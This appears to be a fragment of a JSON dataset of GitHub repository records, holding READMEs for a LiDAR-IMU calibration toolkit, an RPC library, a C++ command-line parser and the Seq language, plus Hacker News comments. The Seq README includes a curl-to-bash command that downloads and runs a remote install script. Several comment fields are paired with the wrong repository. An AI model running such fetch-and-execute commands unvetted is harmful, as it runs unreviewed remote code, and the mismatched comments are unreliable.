"readme": "# LI-Calib\n\n## Overview\n\n**LI-Calib** is a toolkit for calibrating the 6DoF rigid transformation and the time offset between a 3D LiDAR and an IMU. It's based on continuous-time batch optimization. IMU-based cost and LiDAR point-to-surfel distance are minimized jointly, which renders the calibration problem well-constrained in general scenarios. \n\n## **Prerequisites**\n\n- [ROS](http://wiki.ros.org/ROS/Installation) (tested with Kinetic and Melodic)\n\n ```shell\n sudo apt-get install ros-melodic-pcl-ros ros-melodic-velodyne-msgs\n ```\n\n- [Ceres](http://ceres-solver.org/installation.html) (tested with version 1.14.0)\n\n- [Kontiki](https://github.com/APRIL-ZJU/Kontiki) (Continuous-Time Toolkit)\n- Pangolin (for visualization and user interface)\n- [ndt_omp](https://github.com/APRIL-ZJU/ndt_omp) \n\nNote that **Kontiki** and **Pangolin** are included in the *thirdparty* folder.\n\n## Install\n\nClone the source code for the project and build it.\n\n```shell\n# init ROS workspace\nmkdir -p ~/catkin_li_calib/src\ncd ~/catkin_li_calib/src\ncatkin_init_workspace\n\n# Clone the source code for the project and build it. \ngit clone https://github.com/APRIL-ZJU/lidar_IMU_calib\n\n# ndt_omp\nwstool init\nwstool merge lidar_IMU_calib/depend_pack.rosinstall\nwstool update\n# Pangolin\ncd lidar_imu_calib_beta\n./build_submodules.sh\n## build\ncd ../..\ncatkin_make\nsource ./devel/setup.bash\n```\n\n## Examples\n\nCurrently the LI-Calib toolkit only support `VLP-16` but it is easy to expanded for other LiDARs. \n\nRun the calibration:\n\n```shell\n./src/lidar_IMU_calib/calib.sh\n```\n\nThe options in `calib.sh` the have the following meaning:\n\n- `bag_path` path to the dataset.\n- `imu_topic` IMU topic.\n- `bag_start` the relative start time of the rosbag [s].\n- `bag_durr` the duration for data association [s].\n- `scan4map` the duration for NDT mapping [s].\n- `timeOffsetPadding` maximum range in which the timeoffset may change during estimation [s].\n- `ndtResolution` resolution for NDT [m].\n\n\"UI\"\n\nFollowing the step: \n\n1. `Initialization`\n\n2. `DataAssociation`\n\n (The users are encouraged to toggle the `show_lidar_frame` for checking the odometry result. )\n\n3. `BatchOptimization`\n\n4. `Refinement`\n\n6. `Refinement`\n\n7. ...\n\n8. (you cloud try to optimize the time offset by choose `optimize_time_offset` then run `Refinement`)\n\n9. `SaveMap`\n\nAll the cache results are saved in the location of the dataset.\n\n**Note that the toolkit is implemented with only one thread, it would response slowly while processing data. Please be patient** \n\n## Dataset\n\n\"3imu\"\n\nDataset for evaluating LI_Calib are available at [here](https://drive.google.com/drive/folders/1kYLVLMlwchBsjAoNqnrwq2N2Ow5na4VD?usp=sharing). \n\nWe utilize an MCU (stm32f1) to simulate the synchronization Pulse Per Second (PPS) signal. The LiDAR's timestamps are synchronizing to UTC, and each IMU captures the rising edge of the PPS signal and outputs the latest data with a sync signal. Considering the jitter of the internal clock of MCU, the external synchronization method has some error (within a few microseconds).\n\nEach rosbag contains 7 topics:\n\n```\n/imu1/data : sensor_msgs/Imu \n/imu1/data_sync : sensor_msgs/Imu \n/imu2/data : sensor_msgs/Imu \n/imu2/data_sync : sensor_msgs/Imu \n/imu3/data : sensor_msgs/Imu \n/imu3/data_sync : sensor_msgs/Imu \n/velodyne_packets : velodyne_msgs/VelodyneScan\n```\n\n`/imu*/data` are raw data and the timestamps are coincide with the received time. \n\n`/imu*/data_sync` are the sync data, so do `/velodyne_packets` .\n\n## Credits \n\nThis code was developed by the [APRIL Lab](https://github.com/APRIL-ZJU) in Zhejiang University.\n\nFor researchers that have leveraged or compared to this work, please cite the following:\n\nJiajun Lv, Jinhong Xu, Kewei Hu, Yong Liu, Xingxing Zuo. Targetless Calibration of LiDAR-IMU System Based on Continuous-time Batch Estimation. IROS 2020. [[arxiv](https://arxiv.org/pdf/2007.14759.pdf)]\n\n## License\n\nThe code is provided under the [GNU General Public License v3 (GPL-3)](https://www.gnu.org/licenses/gpl-3.0.txt).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hjk41/Remmy", "link": "https://github.com/hjk41/Remmy", "tags": [], "stars": 647, "description": "A simple but usable RPC framework", "lang": "C++", "repo_lang": "", "readme": "Remmy\n=======\n\nRemmy is a simple but usable RPC library. Thanks to the structural simplicity of the code, it is suitable for use in education as well.\n\nThe communication layer can be implemented with any network library. Currently, we support ASIO and ZeroMQ as the network layer.\n\nCurrent implementation uses C++14, so you need a new compiler to compile the code.\n\nTested on both Linux and Windows (Visual Studio 2019).\n\n\nCompiling Test\n=======\n\ntest/test.cpp is a simple test demonstrating how to use Remmy. You can compile it with `CMake`, `make`, or `Visual Studio`.\n\n**Compiling With CMake**\n\nTo compile with `CMake`, use the following command:\n```bash\nuser@myhost:~/projects/Remmy$ mkdir build\nuser@myhost:~/projects/Remmy$ cd build\nuser@myhost:~/projects/Remmy/build$ cmake .. -DCOMM_LAYER=ASIO\n-- The C compiler identification is GNU 7.4.0\n-- The CXX compiler identification is GNU 7.4.0\n-- ...\n-- Configuring done\n-- Generating done\n-- Build files have been written to: /home/user/projects/Remmy/build\nuser@myhost:~/projects/Remmy/build$ make\nScanning dependencies of target remmy_test\n[ 50%] Building CXX object CMakeFiles/remmy_test.dir/test/test.cpp.o\n[100%] Linking CXX executable remmy_test\n[100%] Built target remmy_test\n```\n\nNote that we use `-DCOMM_LAYER=ASIO` option for `CMake` here. Remmy supports ASIO and ZMQ. Here we choose ASIO as the communication layer.\n\nIf you want to use ZeroMQ, you also need to install libzmq.\n\n**Compiling With `make`**\n\nThere is a Makefile under `Remmy/test`, which can be used to compile the test. The communication can be switched by defining the `USE_ASIO` or `USE_ZMQ` at the top of the Makefile.\n\n**Building With VS 2017/2019**\n\n`Remmy/remmy.sln` is a VS 2019 solution file. You can use VS 2019 to open the solution and compile the test project. However, if you choose to use VS 2017, you need to retarget the solution before you can build it. To retarget the solution, open it and right-click on the `Solution 'Remmy'` in `Solution Explorer`, then choose `Retarget Solution`. In the pop-up windows, choose `latest installed version` for `Windows SDK Version`.\n\nBy default the solution uses ASIO as the communication layer. Switching to ZeroMQ requires defining `USE_ZMQ` and `USE_ASIO` macros in project properties. You will also need to specify the location to ZeroMQ library when using ZeroMQ.\n\n\nProgramming interface\n=======\n\n```c++\n// define protocol\nclass RPC_Protocol : public ProtocolWithUID {\npublic:\n ComplexType req;\n size_t resp;\n\n virtual void MarshallRequest(StreamBuffer & buf) {\n req.Serialize(buf);\n }\n\n virtual void MarshallResponse(StreamBuffer & buf) {\n Serialize(buf, resp);\n }\n\n virtual void UnmarshallRequest(StreamBuffer & buf) {\n req.Deserialize(buf);\n }\n\n virtual void UnmarshallResponse(StreamBuffer & buf) {\n Deserialize(buf, resp);\n }\n\n virtual void HandleRequest(void *server) {\n // as a demonstration, this protocol returns req.x + req.y + req.z.size(),\n // and adds this value to server, which is just a std::atomic\n std::atomic* s = static_cast*>(server);\n resp = req.x + (size_t)req.y + req.z.size();\n // note that the handler can be executed by multiple threads at the same time,\n // we need to make it thread-safe\n s->fetch_add(resp);\n REMMY_WARN(\"Server is now %lu\", s->load());\n }\n};\n\n // start server\n // ...\n std::atomic size = 0;\n rpc.RegisterProtocol(&size);\n rpc.StartServing();\n\n // now, create a client\n AsioEP ep(asio::ip::address::from_string(\"127.0.0.1\"), port);\n RPC_Protocol proto;\n proto.req.x = 10;\n proto.req.y = 1.0;\n proto.req.z = \"12345\";\n ec = rpc.RpcCall(ep, proto);\n std::cout << \"response = \" << proto.resp << std::endl;\n```\n\nPlease refer to [/test/test.cpp](/test/test.cpp) for an example on how to use Remmy.\n\n\nContributing\n=======\nEveryone is welcome to contribute to this project, either to improve the code or documentation.\n\nThe whole library can be divided into these parts:\n\n* rpc_stub.h: contains RPCStub class, which is the entry point\n\n* protocol.h: declares the interface of protocols\n\n* serialize.h: implements the Serializer template class\n\n* comm.h: declares the communication layer, which can be implemented with any network libray, such as asio (as in comm_asio.h), ZeroMQ, etc.\n\n* other stuff: incluing logging, message structure, buffer, concurrent queue, unique id, ...\n\nI will try to write as much document as possible in the files, but you are also welcome to contribute standalone document files.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "catchorg/Clara", "link": "https://github.com/catchorg/Clara", "tags": [], "stars": 647, "description": "A simple to use, composable, command line parser for C++ 11 and beyond", "lang": "C++", "repo_lang": "", "readme": "# Clara v1.1.5\n[![Build Status](https://travis-ci.org/catchorg/Clara.svg?branch=master)](https://travis-ci.org/catchorg/Clara)\n[![Build status](https://ci.appveyor.com/api/projects/status/github/catchorg/Clara?brach=master&svg=true)](https://ci.appveyor.com/project/catchorg/clara)\n[![codecov](https://codecov.io/gh/catchorg/Clara/branch/master/graph/badge.svg)](https://codecov.io/gh/catchorg/Clara)\n\n# !! This repository is unmaintained. Go [here](https://github.com/bfgroup/Lyra) for a fork that is somewhat maintained. !!\n\n-----------------------------\n\n\nA simple to use, composable, command line parser for C++ 11 and beyond.\n\nClara is a single-header library.\n\nTo use, just `#include \"clara.hpp\"`\n\nA parser for a single option can be created like this:\n\n```c++\nint width = 0;\n// ...\nusing namespace clara;\nauto cli\n = Opt( width, \"width\" )\n [\"-w\"][\"--width\"]\n (\"How wide should it be?\");\n```\n\nYou can use this parser directly like this:\n\n```c++\nauto result = cli.parse( Args( argc, argv ) );\nif( !result ) {\n std::cerr << \"Error in command line: \" << result.errorMessage() << std::endl;\n exit(1);\n}\n\n// Everything was ok, width will have a value if supplied on command line\n```\n\nNote that exceptions are not used for error handling.\n\nYou can combine parsers by composing with `|`, like this:\n\n```c++\nint width = 0;\nstd::string name;\nbool doIt = false;\nstd::string command;\nauto cli\n = Opt( width, \"width\" )\n [\"-w\"][\"--width\"]\n (\"How wide should it be?\")\n | Opt( name, \"name\" )\n [\"-n\"][\"--name\"]\n (\"By what name should I be known\")\n | Opt( doIt )\n [\"-d\"][\"--doit\"]\n (\"Do the thing\" )\n | Arg( command, \"command\" )\n (\"which command to run\");\n```\n\n`Opt`s specify options that start with a short dash (`-`) or long dash (`--`).\nOn Windows forward slashes are also accepted (and automatically interpretted as a short dash).\nOptions can be argument taking (such as `-w 42`), in which case the `Opt` takes a second argument - a hint,\nor they are pure flags (such as `-d`), in which case the `Opt` has only one argument - which must be a boolean.\nThe option names are provided in one or more sets of square brackets, and a description string can\nbe provided in parentheses. The first argument to an `Opt` is any variable, local, global member, of any type\nthat can be converted from a string using `std::ostream`.\n\n`Arg`s specify arguments that are not tied to options, and so have no square bracket names. They otherwise work just like `Opt`s.\n\nA, console optimised, usage string can be obtained by inserting the parser into a stream.\nThe usage string is built from the information supplied and is formatted for the console width.\n\nAs a convenience, the standard help options (`-h`, `--help` and `-?`) can be specified using the `Help` parser,\nwhich just takes a boolean to bind to.\n\nFor more usage please see the unit tests or look at how it is used in the Catch code-base (catch-lib.net).\nFuller documentation will be coming soon.\n\nSome of the key features:\n\n- A single header file with no external dependencies (except the std library).\n- Define your interface once to get parsing, type conversions and usage strings with no redundancy.\n- Composable. Each `Opt` or `Arg` is an independent parser. Combine these to produce a composite parser - this can be done in stages across multiple function calls - or even projects.\n- Bind parsers directly to variables that will receive the results of the parse - no intermediate dictionaries to worry about.\n- Or can also bind parsers to lambdas for more custom handling.\n- Deduces types from bound variables or lambdas and performs type conversions (via `ostream <<`), with error handling, behind the scenes.\n- Bind parsers to vectors for args that can have multiple values.\n- Uses Result types for error propagation, rather than exceptions (doesn't yet build with exceptions disabled, but that will be coming later)\n- Models POSIX standards for short and long opt behaviour.\n\n## Roadmap\n\nTo see which direction Clara is going in, please see [the roadmap](Roadmap.md)\n\n## Old version\n\nIf you used the earlier, v0.x, version of Clara please note that this is a complete rewrite which assumes C++11 and has\na different interface (composability was a big step forward). Conversion between v0.x and v1.x is a fairly simple and mechanical task, but is a bit of manual\nwork - so don't take this version until you're ready (and, of course, able to use C++11).\n\nI hope you'll find the new interface an improvement - and this will be built on to offer new features moving forwards.\nI don't expect to maintain v0.x any further, but it remains on a branch.\n", "readme_type": "markdown", "hn_comments": "Coroutines fit into some functional languages fairly naturally. They can be constructed out of the primitive operator call/cc (call with current continuation) in Scheme and simple cooperative threading, exceptions, callbacks, coroutines, etc. are usually implemented that way in Scheme, and pretty widely used. It meshes okay I guess with the rest of the language and libraries, but Scheme doesn't really have much in the way of libraries.Coroutines are a type of monad in Haskell. If you want function calls to alternate between execution streams, that sort of chaining of execution, is what Haskell's monads deal with. Instance the type you're using in the Coroutine class, and any functions with the same Coroutine type, will automatically work as coroutines between each other when you suspend them. It's part of the standard library in Control.Monad.Coroutine. Since it's a monad, it composes with other monads, and will work with most library code. As to IO, with a lazy evaluation language, when a blocking call is made, other parts that can still evaluate (not just pending coroutines but also regular functions not depending on the blocking call) can continue, so all IO in Haskell sort of works as you describe there, I think. Lazy evaluation is usually implemented with coroutines, IIRC. In a sense, every value in the program is in its own coroutine, that runs when the value needs to be calculated because some other value depends on it. Analyzing the efficiency of lazy programs suffers the same kind of problem you mention with concurrent programs, to be fair.Elixir has concurrency built in as an easy to use concept. There is the concept of processes running within the runtime, which is called the BEAM. Think of the runtime as a mini OS where you can create lightweight processes as needed to do things asynchronously. You can use a simple Task module[0] to do things async or implement GenServer[1] which is a process running and has state.An example is calling an API that has a paginated response where it indicates the number of pages (like ?page=X in GET request), you can async call each page and accumulate the responses using a map_reduce function[2]. You could fire up like 1000 (or 10k or as many as you like really) of these processes calling an API with different params/creds and handling paginated responses concurrently, each with their own state. I found that Elixir will let you quickly exhaust any rate limit budget/threshold you have in a scenario like this, that is more the limiting factor.[0] https://hexdocs.pm/elixir/1.13.4/Task.html[1] https://hexdocs.pm/elixir/1.13.4/GenServer.html[2] https://hexdocs.pm/elixir/1.13.4/Enum.html#map_reduce/3Love this tool! (Btw title should be one word: \"Shapecatcher\")Similar tool for mathematical symbols: http://detexify.kirelabs.org/classify.htmlThe search isn't really perfect. I tried drawing a (pretty good, IMO) Hiragana \"no\" and that result was in the third place (First was, a latin small m. \u306e looks nothing like an m). Then tried Greek small sigma (\u03c3) but not perfectly (I draw ny sigmas in a weird way, looks like this: http://imgur.com/a/XYVHO), the top result I got (Malayalam fraction one quarter: \u0d73) kind of looks like the thing I drew, but the rest of the results are not really resembling it and there's no sigma there.Pretty cool! I wonder why the recognizer is not very good at differentiating among types of faces (sad face, happy face, etc.)I use this occasionally when trying to find a new glyph. There are some drawbacks though:\u2022 Last updated in 2012: http://shapecatcher.com/news.html\u2022 No way to draw straight lines except pixel-by-pixel (really tedious). This turned out to be a pain when trying to draw various arrow types (made of straight lines).I'm hoping the author, Benjamin Milde, picks the project up again and keeps it updated, or makes it Open Source, then someone else does.I could not get it to identify a British Pound symbol after several attempts. The top proposed glyph was much more obscure and the following ones were increasingly obscure from there.I suspect that the training corpus may have been a table of Unicode glyphs rather than text from the wild.This is kind of a missing piece, in a lot of ways. With such a large character set as Unicode's, discovery can be a real pain - when you see a novel character, how do you find out what it's called, so you can find out how to type it?Unless you're using something like Emacs which lets you point at a character and ask the editor to tell you everything it knows about what's there, this kind of identification becomes a daunting task to contemplate. Shapecatcher does an excellent job of it; as long as you can draw something roughly approximating the glyph you have in mind, it'll very effectively winnow down the search space to a very manageable list of possible matches.This is really great. Works perfectly and solves a very practical problem for me. Unicode really should do something about discoverability though.It reminds me the special character finder in Google Docs, very well done.Android Wear does something like this for emojis - I've gotten pretty good at drawing a \"thumbs up\" to respond to text messages and such.Interesting idea. It seems to struggle a bit with some types of characters. For example, drawing a lowercase pi would return many characters with more than two legs, which showed up ahead of pi itself and other characters that do have the two. Does clicking on the good/bad feedback links in cases like this help to train the algorithm in some way?This is cool, though I was a bit disappointed to notice the part about no support for CJK characters after trying to draw one and not having it recognized. It seems to me that looking up Unihan ideographs is an area where a tool like this could be particularly useful.Pretty neat. Would be useful to be able to restrict the blocks that are searched. For example I might know that the character I'm looking for is Japanese, so if I could let it know that I was looking for is Japanese then it could restrict itself to Katakana, Katakana Phonetic Extensions and other blocks if any that apply to Japanese specifically.Really well done, and handled my crappy drawings just fine.I did see the link to your thesis on captcha, but a specific higher level blog post on how this works would likely be popular.Edit: One piece of feedback...it's hard to draw dots. You have to drag the cursor with the button down, or drag your finger in mobile to get a dot. So dots end up more like little lines. Also, an \"Undo\" to remove the last \"cursor down / draw\" event would be nice. Starting over for every line is the only current option.?\u00ec\u03f2\u0435 homoglyph search tool you've made :)(it found all the letters of the word \"nice\" quite well!)That's really fun!Because they did it!\nAmericans have special powers. \nSee for example Scott Adams:\nhttp://blog.dilbert.com/post/134861704021/my-offer-to-stop-d...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "seq-lang/seq", "link": "https://github.com/seq-lang/seq", "tags": ["bioinformatics", "computational-biology", "genomics", "programming-language", "domain-specific-language", "compiler", "python"], "stars": 647, "description": "A high-performance, Pythonic language for bioinformatics", "lang": "C++", "repo_lang": "", "readme": "## Work on the Seq compiler is being continued in [Codon](https://github.com/exaloop/codon), a general, extensible, high-performance Python compiler. Seq's bioinformatics libraries, features and optimizations are still available and being maintained as [a plugin](https://github.com/exaloop/seq) for Codon.\n\n---\n\n

\n \"Seq\"/\n

\n\n

Seq \u2014 a language for bioinformatics

\n\n

\n \n \"Build\n \n \n \"Gitter\"\n \n \n \"Version\"\n \n \n \"License\"\n \n

\n\n## Introduction\n\n> **A strongly-typed and statically-compiled high-performance Pythonic language!**\n\nSeq is a programming language for computational genomics and bioinformatics. With a Python-compatible syntax and a host of domain-specific features and optimizations, Seq makes writing high-performance genomics software as easy as writing Python code, and achieves performance comparable to (and in many cases better than) C/C++.\n\n**Think of Seq as a strongly-typed and statically-compiled Python: all the bells and whistles of Python, boosted with a strong type system, without any performance overhead.**\n\nSeq is able to outperform Python code by up to 160x. Seq can further beat equivalent C/C++ code by up to 2x without any manual interventions, and also natively supports parallelism out of the box. Implementation details and benchmarks are discussed [in our paper](https://dl.acm.org/citation.cfm?id=3360551).\n\nLearn more by following the [tutorial](https://docs.seq-lang.org/tutorial) or from the [cookbook](https://docs.seq-lang.org/cookbook).\n\n## Examples\n\nSeq is a Python-compatible language, and many Python programs should work with few if any modifications:\n\n```python\ndef fib(n):\n a, b = 0, 1\n while a < n:\n print(a, end=' ')\n a, b = b, a+b\n print()\nfib(1000)\n```\n\nThis prime counting example showcases Seq's [OpenMP](https://www.openmp.org/) support, enabled with the addition of one line. The `@par` annotation tells the compiler to parallelize the following for-loop, in this case using a dynamic schedule, chunk size of 100, and 16 threads.\n\n```python\nfrom sys import argv\n\ndef is_prime(n):\n factors = 0\n for i in range(2, n):\n if n % i == 0:\n factors += 1\n return factors == 0\n\nlimit = int(argv[1])\ntotal = 0\n\n@par(schedule='dynamic', chunk_size=100, num_threads=16)\nfor i in range(2, limit):\n if is_prime(i):\n total += 1\n\nprint(total)\n```\n\nHere is an example showcasing some of Seq's bioinformatics features, which include native sequence and k-mer types.\n\n```python\nfrom bio import *\ns = s'ACGTACGT' # sequence literal\nprint(s[2:5]) # subsequence\nprint(~s) # reverse complement\nkmer = Kmer[8](s) # convert to k-mer\n\n# iterate over length-3 subsequences\n# with step 2\nfor sub in s.split(3, step=2):\n print(sub[-1]) # last base\n\n # iterate over 2-mers with step 1\n for kmer in sub.kmers(step=1, k=2):\n print(~kmer) # '~' also works on k-mers\n```\n\n## Install\n\n### Pre-built binaries\n\nPre-built binaries for Linux and macOS on x86_64 are available alongside [each release](https://github.com/seq-lang/seq/releases). We also have a script for downloading and installing pre-built versions:\n\n```bash\n/bin/bash -c \"$(curl -fsSL https://seq-lang.org/install.sh)\"\n```\n\n### Build from source\n\nSee [Building from Source](docs/sphinx/build.rst).\n\n## Documentation\n\nPlease check [docs.seq-lang.org](https://docs.seq-lang.org) for in-depth documentation.\n\n## Citing Seq\n\nIf you use Seq in your research, please cite:\n\n> Ariya Shajii, Ibrahim Numanagi\u0107, Riyadh Baghdadi, Bonnie Berger, and Saman Amarasinghe. 2019. Seq: a high-performance language for bioinformatics. *Proc. ACM Program. Lang.* 3, OOPSLA, Article 125 (October 2019), 29 pages. DOI: https://doi.org/10.1145/3360551\n\nBibTeX:\n\n```\n@article{Shajii:2019:SHL:3366395.3360551,\n author = {Shajii, Ariya and Numanagi\\'{c}, Ibrahim and Baghdadi, Riyadh and Berger, Bonnie and Amarasinghe, Saman},\n title = {Seq: A High-performance Language for Bioinformatics},\n journal = {Proc. ACM Program. Lang.},\n issue_date = {October 2019},\n volume = {3},\n number = {OOPSLA},\n month = oct,\n year = {2019},\n issn = {2475-1421},\n pages = {125:1--125:29},\n articleno = {125},\n numpages = {29},\n url = {http://doi.acm.org/10.1145/3360551},\n doi = {10.1145/3360551},\n acmid = {3360551},\n publisher = {ACM},\n address = {New York, NY, USA},\n keywords = {Python, bioinformatics, computational biology, domain-specific language, optimization, programming language},\n}\n```\n", "readme_type": "markdown", "hn_comments": "The code examples look like Python 2 rather than Python 3. Print does have not parentheses. Why was this decision made?Looks great, will definitely give this a try since it does sequence manipulations that I otherwise have to write myself.Will this be available via conda? And how would seq integreate with Snakemake, since that is also based on Python?I'm wondering if Seq can also serve as a general-purpose replacement for Python whenever a fast executable is needed.Quick explainer video: https://youtu.be/5bk4Wc5Op2MI am a CS person who works with bioinformaticians every day as part of my job.I really like that Seq seems to have built-in some parallelization ability. I spend no small amount of time in my day job doing that manually in R with RcppParallel for loops that are totally independent across each iteration.Bioinformaticians are often educated to use a specific programming language and environment. They aren't usually looking to try other languages. For example, I support our bioinformatics group and they are basically 100% R and RStudio users. We have a single user of Python and that user is doing \"typical\" tensorflow stuff with images.I've noticed this same bias towards a single language for some other academic niches. Like SAS or Stata camps in public health or psychology - I think of these languages as basically the same, but for non-CS folks the perception seems to be more like English vs Russian.Even more complicated, researchers may be extremely committed to a specific library in a language and suspicious of languages that don't have their favorite library available.Any shift to new tooling for these highly-committed users will almost certainly require large and obvious benefits to gain traction.Also see this comparison between Julia's BioSequences and Seq by Jakob Nissen and Ben Ward: https://biojulia.net/post/seq-lang/See also:https://dl.acm.org/doi/pdf/10.1145/3360551https://www.nature.com/articles/s41587-021-00985-6 (paywalled)It's an impressive project, but I'm not sure the niche is big enough. It's certainly come a long way since the last time I looked at it!My biggest concern is that Seq sucks users into a sort of local maximum. While piping syntax is nice, and the built-in routines are handy, it's a lot less flexible than a \"mainstream\" programming language, simply because of the smaller community and relative paucity of libraries. BioPython[1] has been around a long long time, and I think a lot of potential users of Seq would be better suited by using a regular bioinformatics library in the language they know best.e.g: The example of reading Fasta files in Seq: # iterate over everything\n for r in FASTA('genome.fa'):\n print r.name\n print r.seq\n\nversus BioPython: from Bio import SeqIO\n for r in SeqIO.parse(\"genome.fa\", \"fasta\"):\n print(r.id)\n print(r.seq)\n\nIt might be pretty useful as a teaching tool, but I'm skeptical of its long-term benefit to professionals. I'm not sure the ecosystem of Seq users will be large enough, y'know? Again, it's pretty impressive work, and it's come a long way. I wish the devs all the best. :)1. https://biopython.org/I like this idea. However to me it is similar to using \u00e0 la carte tools/programs along with bash script or DSL such as Nextflow. More often these stand-alone programs are already written in compiled languages. I am sure Seq will allow to build customized programs as compared to scripting or gluing programs.It\u2019s odd that they didn\u2019t include Nim in the benchmarks in their paper: https://dl.acm.org/doi/pdf/10.1145/3360551> Seq is a Python-compatible language, and the vast majority of Python programs should work without any modifications> Seq is able to outperform Python code by up to 160x.So ... a reimplementation of Python that can outperform cpython by over 100 times? I know literally nothing about this project, but I have to say that rings pretty false for me. Hell, even PyPy has trouble with many applications. (Plus they're claiming to outperform \"equivalent\" C code by 2x.)Even if the performance claims are overblown, it's always nice to see new work on compiled languages with easy-to-read syntax. It's hard to beat Python for an education / prototyping language, so I will definitely be giving this a look.Typically, any high performance (low latency or high throughput) genomics/bioinformatics applicaiton is not going to be written in plain Python, except possibly for prototyping. Instead, nearly all codes today are written in C++ or Java, with some sort of command and control in Python or a DAG-based workflow scheduler.I don't expect the community will adopt other languages at a large scale. My hope, though, is that more of these algorithms move to real distributed processing systems like Spark, to take advantage of all the great ideas in systems like that. But genomics will continue to trail the leading edge by about 20 years for the foreseeable future.I'm in the target market but can't use this unless it supports all of my Python libraries like Django and Numpy.It seems to me there is a huge demand for making Python faster, whether it be via making a more optimisation friendly subset, or ideally throwing engineering talent into improving the interpreter.V8 shows this can be done with highly dynamic Javascript. I guess we need a big corporate sponsor or the community to fund some positions.It's kind of crazy how few developers are working on optimising cPython, it may even be a worth it for environmental reasons.Used it for coding Coursera/Stepik's Bioinformatics course [1] when it was first announced 2 years ago.Not claiming it as any sort of reference, but you can see how it [2] may be used to solve some basic genome sequencing.[1] https://www.coursera.org/specializations/bioinformatics[2] https://github.com/fuzzthink/seq-genomics> Think of Seq as a strongly-typed and statically-compiled Python: all the bells and whistles of Python, boosted with a strong type system, without any performance overhead.A pitch most people doing applied bioinformatics won\u2019t understand/appreciate.How do you pronounce Seq?Hi everyone, I\u2019m one of the developers on the Seq project \u2014 I was delighted to see it posted here! We started this project with a focus on bioinformatics, but since then we\u2019ve added a lot of language features/libraries that have closed the gap with Python by a decent margin, and Seq today can be useful in other areas or even for general Python programs (although there are still limitations of course). We\u2019re in the process of creating an extensible / plugin-able Python compiler based on Seq that allow for other domain-extensions. The upcoming release also has some neat features like OpenMP integration (e.g. \u201c@par(num_threads=10) for i in range(N): \u2026\u201d will run the loop with 10 threads). Happy to answer any questions!This looks cool, I also love how easy the setup was considering lots of niche languages I try sometimes seem to have arcane setup steps and dependenciesAnd some used to knit themself to freedom:https://widerimage.reuters.com/story/prison-knittersIn India, there is a prison that has somewhat of a tradition of experimenting with unusual methods of behavioural change.\nLast time in 2015 it was Yoga:https://www.hindustantimes.com/india/shorter-terms-for-priso...An even more traditional way is known in Thailand, prison fights.\nOfficially:https://muaythai-world.com/muay-thai-thailand-prison-fights-...If anyone is interested in the wider topic, this subject is called bibliotherapy, and has a long history. This specific program was popularized in the early 1990s at the University of Massachusetts Dartmouth as an alternative probation sentencing program, and it was so successful it later branched out around the world. Key advocates include Robert Waxler, Jean Trounstine, and Mary Stephenson, and researchers Roger Jarjoura and Susan T. Krumholz.I expect it'll create an illicit trade of essay plans and verbal story tellersIf you are interested in the Brazilian prison system you should take a look into this:[1] - Retratos do C\u00e1rcere: https://vimeo.com/383384532, https://www.pandafilmes.com.br/portfolio/retratos-do-carcere\nThis is a series about inmates life's. It start giving a brief overview of the current state of Brazilian prison system, including some history to explain why it is this way. Then it go on to show what really means to be an inmate in Brazil. It shows the conditions inmates have to endure, the treatment inmate's family receives, the role religion has inside Brazilian prisons, etc.[2] - Central: O Poder das Fac\u00e7\u00f5es no Maior Pres\u00eddio do Brasil: https://www.youtube.com/watch?v=7lbSBVpo9JA\nThis is a documentary about the \"Pres\u00eddio Central\" (https://pt.wikipedia.org/wiki/Pres%C3%ADdio_Central_de_Porto...) which is the largest prison in the state of Rio Grande Do Sul. The prison is overcrowded and falling apart. It is considered one of the worsts active prisons in Brazil.[3] - Deus e o Diabo em Cima da Muralha: https://www.youtube.com/watch?v=VbTMV1-0BTk\nThis one follows Drauzio Varella, a famous physician, while he gives the last goodbye to the most infamous prison in Brazil(https://en.wikipedia.org/wiki/Carandiru_Penitentiary).Unfortunately I don't know if these are available in languages other than Portuguese.Pizza huthttps://www.youtube.com/watch?v=EvFa63DZGOsThis could be a bit discriminatory, Brazil has a high analphabetism rate, it will be worst in prison, I suppose.\nThe ones who can't read should be offered courses and maybe start with easy comics.This is such a condescending understanding of why most crime happens. Especially in a country with as much wealth disparity as Brazil.I am very confused at how it is expected that books are likely to reduce crime \u2013 we have a very well-read set of criminals operating in our world today; they are called white-collar criminals, they have gone to the top institutions, they have read plenty of books and it does not seemed to have improved the virtue of their moral character beyond making their plots more audacious.French philosopher Bernard Stiegler \"an important thinker on the effects of digital technology\" became a philosopher while studying in prison (for robbery):https://en.wikipedia.org/wiki/Bernard_StieglerHe wrote a book about it:https://en.wikipedia.org/wiki/Acting_Out_(book)At school we had a teacher who tried to make us read 10 books a year.\nYou could choose whatever book you wanted, and you had to write a small summary.\nSo every one headed to the school library and looked for the smallest books available.\nThe most popular book that every one read was called something like: \"Collection of letters from from my Grandfather\" and had around 50 to 70 pages and was very boring.\nMany also cheated by watching movie adaptations of books.Edit: This was back in the time when you could not go online and find dozens of book summaries within minutes.Maybe it was deliberate word play, but 'their' here refers to the prisoners, not the books, in case anyone else misinterpreted this headline to imply they were actually editing the books.As a Brazilian this why we have the largest number of homicides and one of highest rate of homicides ->https://en.wikipedia.org/wiki/List_of_countries_by_intention...What boils down is the Narco and crime sponsor policies that looks good on paper but on reality is made to free more prisoners.The govt likes it because \"feels good\" and reduce prisoner spending and looks good on UN stats.Lets by example say that I had a discussion with someone here and I killed him.If I am on the 10% solved murdered case I will be brought to justice.Then criminal justice will come:1. Was I caught in \"flagrante\" (up to 24h after crime)? No? Wait for judgment outside or wait for preventive prison;2. Do I have a job or a clean record? If yes wait for trial at home;3. Did I intent to kill? Yes go to trial, Then you may pay some damages (very low fees) and community service.Then comes trial. I am consider Guilty IF ONLY, IF ONLY when ALL resources and recurses of law were finished.It is normal to crimes prescribes after 20 year abusing courts but it is the law.So I lost all recurses and now I am in Jail. The maximum sentence is 30 years (Even if I kill 10 people).I have the right to intimate visit (I can have sex with my girlfriend/friend/wife).If I am studying I can leave to study.If I work each worked day another one is removed from my sentence.If I read a book too.Then If I have good \"behavior\" my sentence is reduced to 1/6.DO the math -> max 30 /6 -> 5 years - bonus points (book, studying) I am free in 2-3 years.Now check the link I posted above -> https://en.wikipedia.org/wiki/List_of_countries_by_intention...\n(click count, rate)\nBrazil is very humane with criminals but not with its victims.My lower middle class condo has electrified fences, armed guards, CCTV, patrols, 